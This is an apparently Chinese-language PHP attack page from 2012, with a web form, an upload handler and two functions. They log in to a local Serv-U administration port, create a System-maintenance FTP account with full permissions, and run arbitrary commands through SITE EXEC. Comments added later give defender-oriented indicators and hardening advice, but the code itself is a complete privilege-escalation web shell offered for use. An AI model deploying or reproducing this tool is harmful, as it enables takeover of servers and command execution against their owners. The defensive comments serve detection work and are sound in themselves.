8 第一步:添加FTP用户
用户名:
密  码:
端 口:
USER  :
PASS  :
PORT  :
路  径:
 
当前路径:
8 第二步:执行命令
USER  :'>
PASS  :'>
PORT  :'>
CMDPATH :' size='55'>
Command :
 

命令回显:点击进入第二步执行命令Go Execute

点击进入第二步执行命令Go Execute'; } if($act=='Execute'){ $path=str_replace('\\','/',$_POST['path']); echo '

命令回显:
'; } if($_POST['subfile']){ $upfile=$_POST['p'].$_FILES['file']['name']; if(is_uploaded_file($_FILES['file']['tmp_name'])) { if(!move_uploaded_file($_FILES['file']['tmp_name'],$upfile)){ echo '
上传失败
'; }else{ setcookie('cmdpath',$upfile); echo '
上传成功,路径为'.$upfile.'




'; } } } if($_POST['read']){ echo '

'; } echo '
Copyright By cfking 2012
Blog:www.luoyes.com Bbs:www.90sec.org
';
// The quote and semicolon above terminate the footer echo string opened on an
// earlier line; the two helper functions of this page start here.

/**
 * Creates (or overwrites) an FTP account through an FTP daemon's loopback
 * administration channel and echoes the daemon's replies into the HTTP response.
 *
 * The command vocabulary used (SITE MAINTENANCE, -SETUSERSETUP, -GETUSERSETUP)
 * looks like the Serv-U local administration protocol -- NOTE(review): inferred
 * from the strings only, the page never names the product.
 *
 * Every argument is concatenated into a protocol line as received; nothing in
 * this function validates or escapes them.
 *
 * Reviewer notes, defender view:
 *  - The account is written with "-Maintenance=System" and an Access rule of
 *    "<homedir>|RWAMELCDP", i.e. the widest privilege and permission set this
 *    record format offers. An account carrying those fields that no
 *    administrator created is an indicator of compromise.
 *  - The connection always targets 127.0.0.1, so the traffic never crosses a
 *    network sensor. Host telemetry is the useful source: the web server / PHP
 *    worker opening a loopback socket to the FTP administration port, and
 *    unexpected changes to the daemon's user store.
 *  - Hardening that breaks this path: non-default credentials and port for the
 *    local administration interface, the FTP service running under a
 *    low-privilege account, and fsockopen unavailable to web-facing PHP
 *    (php.ini disable_functions) where the application does not need it.
 *
 * @param mixed $ftpport  Sent as the "-PortNo=" field of the account record.
 * @param mixed $user     Name of the account to write ("-User=").
 * @param mixed $password Password of the account to write ("-Password=").
 * @param mixed $homedir  Sent as "-HomeDir=" and as the path of the Access rule.
 * @param mixed $suser    Login name presented to the administration port.
 * @param mixed $spass    Password presented to the administration port.
 * @param mixed $sport    TCP port on 127.0.0.1 to connect to.
 * @return void           Output goes straight to the response via echo.
 */
function up($ftpport,$user,$password,$homedir,$suser,$spass,$sport){
    // Loopback only, 30 second connect timeout.
    $fp = fsockopen ("127.0.0.1", $sport, $errno, $errstr, 30);
    if (!$fp) {
        // Connect failed: print the socket error. The line break inside the
        // literal is part of the string and is kept exactly as found.
        echo "$errstr ($errno)
\n";
    } else {
        // Authenticate to the administration port. The one-second sleeps pace
        // the writes; no reply is read or checked before the next command goes out.
        fputs ($fp, "USER ".$suser."\r\n");
        sleep (1);
        fputs ($fp, "PASS ".$spass."\r\n");
        sleep (1);
        // Switch the session into maintenance mode.
        fputs ($fp, "SITE MAINTENANCE\r\n");
        sleep (1);
        // Start of the account record that is written to the daemon.
        fputs ($fp, "-SETUSERSETUP\r\n");
        fputs ($fp, "-IP=0.0.0.0\r\n");
        fputs ($fp, "-PortNo=".$ftpport."\r\n");
        fputs ($fp, "-User=".$user."\r\n");
        fputs ($fp, "-Password=".$password."\r\n");
        fputs ($fp, "-HomeDir=".$homedir."\r\n");
        fputs ($fp, "-LoginMesFile=\r\n");
        fputs ($fp, "-Disable=0\r\n");
        fputs ($fp, "-RelPaths=0\r\n");
        fputs ($fp, "-NeedSecure=0\r\n");
        fputs ($fp, "-HideHidden=0\r\n");
        fputs ($fp, "-AlwaysAllowLogin=0\r\n");
        fputs ($fp, "-ChangePassword=1\r\n");
        fputs ($fp, "-QuotaEnable=0\r\n");
        fputs ($fp, "-MaxUsersLoginPerIP=-1\r\n");
        fputs ($fp, "-SpeedLimitUp=-1\r\n");
        fputs ($fp, "-SpeedLimitDown=-1\r\n");
        fputs ($fp, "-MaxNrUsers=-1\r\n");
        fputs ($fp, "-IdleTimeOut=600\r\n");
        fputs ($fp, "-SessionTimeOut=-1\r\n");
        fputs ($fp, "-Expire=0\r\n");
        fputs ($fp, "-RatioUp=1\r\n");
        fputs ($fp, "-RatioDown=1\r\n");
        fputs ($fp, "-RatiosCredit=0\r\n");
        fputs ($fp, "-QuotaCurrent=0\r\n");
        fputs ($fp, "-QuotaMaximum=0\r\n");
        // Account privilege level: the field audits of the user store should key on.
        fputs ($fp, "-Maintenance=System\r\n");
        fputs ($fp, "-PasswordType=Regular\r\n");
        fputs ($fp, "-Ratios=None\r\n");
        // Access rule for $homedir with the full permission-letter set.
        // NOTE(review): this field starts with a space where the others start
        // with "-"; kept as found, may be an artefact of how the page was extracted.
        fputs ($fp, " Access=".$homedir."|RWAMELCDP\r\n");
        sleep (1);
        // Read the record back so the result shows up in the echoed output.
        fputs ($fp, "-GETUSERSETUP\r\n");
        fputs ($fp, "-IP=0.0.0.0\r\n");
        fputs ($fp, "-PortNo=".$ftpport."\r\n");
        fputs ($fp, " User=".$user."\r\n");
        sleep (1);
        fputs ($fp, "QUIT\r\n");
        sleep (1);
        // Drain everything the daemon sent, in reads of at most 127 bytes, and
        // echo it unescaped into the page.
        while (!feof($fp)) {
            echo fgets ($fp,128);
        }
        fclose ($fp);
    }
}

/**
 * Logs in to an FTP service on 127.0.0.1 and sends one "SITE EXEC" line built
 * from $path and $cmd, then echoes the server's replies into the HTTP response.
 *
 * $path and $cmd are concatenated into the command line as received; this
 * function performs no validation.
 *
 * Reviewer notes, defender view:
 *  - Whatever SITE EXEC starts runs with the FTP service's privileges, not the
 *    web server's, which is why the service account's privilege level matters.
 *  - "SITE EXEC" entries in the FTP daemon's log from a loopback client, and
 *    child processes spawned by the FTP service, are the events to alert on.
 *  - Disabling SITE EXEC in the daemon configuration, where the product allows
 *    it, removes this path.
 *
 * @param mixed $ftpport  TCP port on 127.0.0.1 to connect to.
 * @param mixed $user     FTP login name.
 * @param mixed $password FTP password.
 * @param mixed $cmd      Second part of the SITE EXEC argument.
 * @param mixed $path     First part of the SITE EXEC argument.
 * @return void           Output goes straight to the response via echo.
 */
function ftpcmd($ftpport,$user,$password,$cmd,$path){
    // Loopback only, 30 second connect timeout.
    $conn_id = fsockopen ("127.0.0.1", $ftpport, $errno, $errstr, 30);
    if (!$conn_id) {
        // Connect failed: print the socket error (literal kept exactly as found).
        echo "$errstr ($errno)
\n";
    } else {
        // Log in; replies are not read or checked between commands.
        fputs ($conn_id, "USER ".$user."\r\n");
        sleep (1);
        fputs ($conn_id, "PASS ".$password."\r\n");
        sleep (1);
        // The single command this function exists to send.
        fputs ($conn_id, "SITE EXEC ".$path." ".$cmd."\r\n");
        fputs ($conn_id, "QUIT\r\n");
        sleep (1);
        // Echo the whole session transcript, unescaped, into the page.
        while (!feof($conn_id)) {
            echo fgets ($conn_id,128);
        }
        fclose($conn_id);
    }
}
?>